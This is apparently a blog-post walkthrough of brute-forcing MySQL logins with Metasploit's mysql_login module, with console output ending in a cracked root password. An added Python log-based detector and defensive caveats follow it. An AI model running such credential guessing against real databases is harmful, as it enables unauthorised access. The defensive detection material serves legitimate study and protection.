Sunday, January 16, 2011

Brute-force MySQL logins using Metasploit

# the victim must have port 3306 (MySQL) reachable
# create a password list, e.g. pass.txt, one password per line
# create a user list, e.g. users.txt, one username per line
# 127.0.0.1 below is only an example target; put the victim's address in RHOSTS
here we go ...
msf > use scanner/mysql/mysql_login
msf auxiliary(mysql_login) > set PASS_FILE /root/pass.txt
PASS_FILE => /root/pass.txt
msf auxiliary(mysql_login) > set USER_FILE /root/users.txt
USER_FILE => /root/users.txt
msf auxiliary(mysql_login) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf auxiliary(mysql_login) > show options
Module options:

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             yes       Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE         /root/pass.txt   no        File containing passwords, one per line
   RHOSTS            127.0.0.1        yes       The target address range or CIDR identifier
   RPORT             3306             yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_FILE         /root/users.txt  no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts


msf auxiliary(mysql_login) > exploit
[*] 127.0.0.1:3306 - Found remote MySQL version 5.1.41
[*] 127.0.0.1:3306 Trying username:'admin' with password:''
[*] 127.0.0.1:3306 failed to login as 'admin' with password ''
[*] 127.0.0.1:3306 Trying username:'root' with password:''
[+] 127.0.0.1:3306 - SUCCESSFUL LOGIN 'root' : 'root'
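Every guess the module makes is a rejected authentication on the server, and with log_warnings set to 2 or higher a MySQL 5.1 server writes each one to its error log as an "Access denied for user" warning. The following is an added example, not part of the original post: a small detector that parses such lines and flags any client address with five or more rejected logins inside a sliding 60-second window, which is exactly the pattern a run like the one above produces. The log format, the threshold and the sample lines are assumptions made for this example; the log lines are constructed, not captured from a real host.

```python
"""Detect MySQL password guessing from the server's error log.

Added example, not part of the original post. It assumes the MySQL 5.1
error-log format for rejected logins,
  "YYMMDD HH:MM:SS [Warning] Access denied for user 'u'@'h' (using password: YES)"
which the server only writes when log_warnings is 2 or higher. The sample
lines below are constructed, not captured from a real host.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

ACCESS_DENIED = re.compile(
    r"^(?P<date>\d{6})\s+(?P<time>\d{1,2}:\d{2}:\d{2})\s+\[Warning\]\s+"
    r"Access denied for user '(?P<user>[^']*)'@'(?P<host>[^']+)'"
    r" \(using password: (?P<pw>YES|NO)\)"
)

# Constructed sample: one scanner (10.0.0.5) cycling through two users with a
# blank password first, then wordlist entries; plus one unrelated typo from a
# legitimate client a few minutes later.
SAMPLE_LOG = [
    "110116 14:02:10 [Note] /usr/sbin/mysqld: ready for connections.",
    "110116 14:02:11 [Warning] Access denied for user 'admin'@'10.0.0.5' (using password: NO)",
    "110116 14:02:11 [Warning] Access denied for user 'admin'@'10.0.0.5' (using password: YES)",
    "110116 14:02:12 [Warning] Access denied for user 'admin'@'10.0.0.5' (using password: YES)",
    "110116 14:02:12 [Warning] Access denied for user 'root'@'10.0.0.5' (using password: NO)",
    "110116 14:02:13 [Warning] Access denied for user 'root'@'10.0.0.5' (using password: YES)",
    "110116 14:02:13 [Warning] Access denied for user 'root'@'10.0.0.5' (using password: YES)",
    "110116 14:05:40 [Warning] Access denied for user 'appuser'@'192.168.1.20' (using password: YES)",
]


def parse_denials(lines):
    """Return (timestamp, user, host, used_password) for every rejected login."""
    events = []
    for line in lines:
        m = ACCESS_DENIED.match(line)
        if not m:
            continue  # [Note] lines, startup banners, anything that is not a denial
        ts = datetime.strptime(f"{m['date']} {m['time']}", "%y%m%d %H:%M:%S")
        events.append((ts, m["user"], m["host"], m["pw"] == "YES"))
    return events


def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Flag hosts with >= threshold rejected logins inside any sliding window.

    Returns {host: (peak_failures_in_one_window, sorted_usernames_tried)}.
    """
    by_host = defaultdict(list)
    for ts, user, host, _ in parse_denials(lines):
        by_host[host].append((ts, user))

    alerts = {}
    for host, events in by_host.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Advance the window start until events[start:end+1] spans <= window.
            while events[end][0] - events[start][0] > window:
                start += 1
            count = end - start + 1
            # Keep the densest window seen for this host.
            if count >= threshold and count > alerts.get(host, (0, []))[0]:
                users = sorted({u for _, u in events[start:end + 1]})
                alerts[host] = (count, users)
    return alerts


if __name__ == "__main__":
    for host, (count, users) in detect_bruteforce(SAMPLE_LOG).items():
        print(f"{host}: {count} rejected logins within 60s, users tried: {users}")
```

Two caveats for whoever is on the defending side. The error log records only denials, so the successful 'root':'root' guess at the end of the run leaves no line there; what the defender sees is a burst of failures that simply stops, and catching the success itself needs the general query log or an audit plugin. And max_connect_errors counts connection attempts interrupted before the handshake completes, not rejected passwords, so it does not throttle a run like this one; address-based alerting or a firewall rule on 3306 does.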


********************************************************************************
# mysql -h 127.0.0.1 -u root -proot
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 53
Server version: 5.1.41-3ubuntu12 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
+--------------------+
2 rows in set (0.01 sec)

mysql>

(Passing the password inline with -proot leaves it in the shell history and in the process list visible to other users on that box; a bare -p makes the client prompt for it instead.)




./finished
